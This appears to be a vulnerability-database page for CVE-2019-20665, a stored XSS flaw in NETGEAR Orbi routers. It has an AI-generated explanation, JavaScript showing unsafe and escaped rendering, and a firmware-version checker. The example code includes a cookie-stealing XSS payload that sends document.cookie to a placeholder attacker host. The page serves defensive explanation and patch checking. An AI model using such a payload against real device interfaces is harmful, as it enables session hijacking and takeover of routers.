VYPR
Unrated severity · NVD Advisory · Published Apr 15, 2020 · Updated Aug 5, 2024

CVE-2019-20665

Description

Certain NETGEAR devices are affected by stored XSS. This affects RBR20 before 2.3.5.26, RBS20 before 2.3.5.26, RBK20 before 2.3.5.26, RBR40 before 2.3.5.30, RBS40 before 2.3.5.30, RBK40 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, and RBK50 before 2.3.5.30.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

NETGEAR Orbi WiFi systems are vulnerable to stored cross-site scripting (XSS) before firmware versions 2.3.5.26 or 2.3.5.30, allowing attackers to execute arbitrary script in the web interface.

Vulnerability

A stored cross-site scripting (XSS) vulnerability exists in the web management interface of certain NETGEAR Orbi WiFi system models. Affected devices include the RBR20, RBS20, and RBK20 running firmware versions prior to 2.3.5.26, as well as the RBR40, RBS40, RBK40, RBR50, RBS50, and RBK50 running firmware versions prior to 2.3.5.30 [1]. The injected script is persisted on the device and fires when a user loads a page of the web interface that renders the stored value without adequate output encoding.

Exploitation

An attacker who can reach the device's web interface, either with valid credentials or through the browser of a user who is already logged in, saves a script payload into a field that the device persists and later renders. The NVD description does not name the affected field; free-text configuration parameters such as a device name are the typical sink for this class of bug. The payload then executes whenever an administrator or other user views the page that displays that field [1]. Because the script runs inside the victim's own authenticated session, no further authentication is required for it to act on the device.
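The rendering mistake behind a stored XSS of this kind, shown as an added illustration rather than NETGEAR's code: a persisted configuration value (here a hypothetical device-name field, with a constructed payload) is concatenated raw into the admin page's markup, beside the hardened form that encodes it for the HTML text context it lands in. The allow-list validator and the `cellIsInert` check are likewise assumptions added for the example.

```javascript
// Added illustration of the stored-XSS pattern (not NETGEAR code).
// Constructed attacker payload: what a malicious user might save as a device name.
// attacker.example is a reserved placeholder domain.
const STORED_DEVICE_NAME =
  `<img src=x onerror="location='http://attacker.example/?c='+document.cookie">`;

// Encode the five characters that change meaning in HTML text or attribute context.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable rendering: the stored value is interpolated raw into markup,
// so the browser parses the payload as an element and runs its event handler.
function renderDeviceRowUnsafe(name) {
  return `<tr><td class="device-name">${name}</td></tr>`;
}

// Hardened rendering: the stored value is encoded for the text node it becomes.
function renderDeviceRowSafe(name) {
  return `<tr><td class="device-name">${escapeHtml(name)}</td></tr>`;
}

// Defence in depth at save time (hypothetical policy): a device name must look
// like an RFC 1123 hostname label, 1 to 63 characters, so markup is never stored.
function isAcceptableDeviceName(name) {
  return /^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$/.test(name);
}

// Review/test check: a correctly encoded text node never contains a raw '<' or '>'.
// Returns true when the device-name cell is inert, false when markup leaked through.
function cellIsInert(html) {
  const m = /<td class="device-name">([\s\S]*?)<\/td>/.exec(html);
  return m !== null && !/[<>]/.test(m[1]);
}
```

The output-encoding fix is the one that removes the bug; the input allow-list only narrows what can be stored and does not help for fields that legitimately accept punctuation, which is why the example applies both.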

Impact

Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the web interface, leading to potential theft of session cookies, modification of device settings, or further attacks within the local network. The impact is bounded by what the victim user is permitted to do; because that user is typically an administrator, the script can drive the management functionality of the device [1]. Even where the session cookie is not readable from script, the injected code can issue requests from the victim's browser that carry the session, so an HttpOnly cookie flag alone is not a defence against this class of bug.

Mitigation

NETGEAR has released fixed firmware versions: 2.3.5.26 for RBR20, RBS20, and RBK20; and 2.3.5.30 for RBR40, RBS40, RBK40, RBR50, RBS50, and RBK50 [1]. Users should update their devices to these or later firmware versions. To check exposure, compare the firmware version shown in each unit's admin interface against the threshold for its model; the comparison must be numeric per dotted component, since 2.3.5.9 is older than 2.3.5.26 even though it sorts later as a string. The advisory lists no workaround; applying the firmware update is the only fix [1]. Until that is done, limiting who can reach the management interface (no remote or WAN-side management, trusted LAN hosts only) reduces the chance of a payload being stored but does not remove the flaw.
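A version check that applies the advisory's per-model thresholds to an inventory, added here as an example and not NETGEAR tooling. The fixed versions are those from the CVE description; the accepted version-string format (optional leading "V", dotted numbers, an ignored "_suffix"), the model identifiers used as keys, and the inventory lines are assumptions constructed for the example.

```javascript
// Added check (not NETGEAR tooling): is a unit still inside the advisory's ranges?
// Thresholds are the fixed versions from the CVE description.
const FIXED_VERSIONS = {
  RBR20: '2.3.5.26', RBS20: '2.3.5.26', RBK20: '2.3.5.26',
  RBR40: '2.3.5.30', RBS40: '2.3.5.30', RBK40: '2.3.5.30',
  RBR50: '2.3.5.30', RBS50: '2.3.5.30', RBK50: '2.3.5.30',
};

// Hypothetical input format: optional leading 'V', dotted numbers, optional '_suffix'
// that is ignored. Returns an array of integers, or null if nothing numeric is found.
function parseVersion(raw) {
  const core = String(raw).trim().replace(/^v/i, '').split('_')[0];
  const parts = core.split('.').map(p => Number.parseInt(p, 10));
  if (parts.length === 0 || parts.some(Number.isNaN)) return null;
  return parts;
}

// Numeric comparison per component; missing trailing components count as 0,
// so 2.3.5 equals 2.3.5.0 and 2.3.5.9 is older than 2.3.5.26 (a string compare
// would get the second case wrong).
function compareVersions(a, b) {
  const n = Math.max(a.length, b.length);
  for (let i = 0; i < n; i++) {
    const x = a[i] ?? 0;
    const y = b[i] ?? 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// 'vulnerable' | 'fixed' | 'not-affected' (model not in the advisory) | 'unknown'
function assess(model, firmware) {
  const fixed = FIXED_VERSIONS[String(model).toUpperCase()];
  if (!fixed) return 'not-affected';
  const running = parseVersion(firmware);
  if (!running) return 'unknown';
  return compareVersions(running, parseVersion(fixed)) < 0 ? 'vulnerable' : 'fixed';
}

// Constructed sample inventory, e.g. exported from a management console.
const SAMPLE_INVENTORY = [
  { host: 'orbi-router', model: 'RBR50', firmware: 'V2.3.5.30_1.0.5' },
  { host: 'orbi-sat-1',  model: 'RBS50', firmware: 'V2.3.1.44' },
  { host: 'orbi-sat-2',  model: 'RBS20', firmware: '2.3.5.9' },
  { host: 'r7000',       model: 'R7000', firmware: '1.0.11.100' },
  { host: 'orbi-sat-3',  model: 'RBS40', firmware: '' },
];

function assessInventory(inventory) {
  return inventory.map(d => ({ host: d.host, status: assess(d.model, d.firmware) }));
}

for (const r of assessInventory(SAMPLE_INVENTORY)) {
  console.log(`${r.host}: ${r.status}`);
}
```

Units that come back as 'unknown' (no parseable version) deserve a manual look rather than being treated as fixed; silently dropping them is the usual way such checks under-report.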

AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.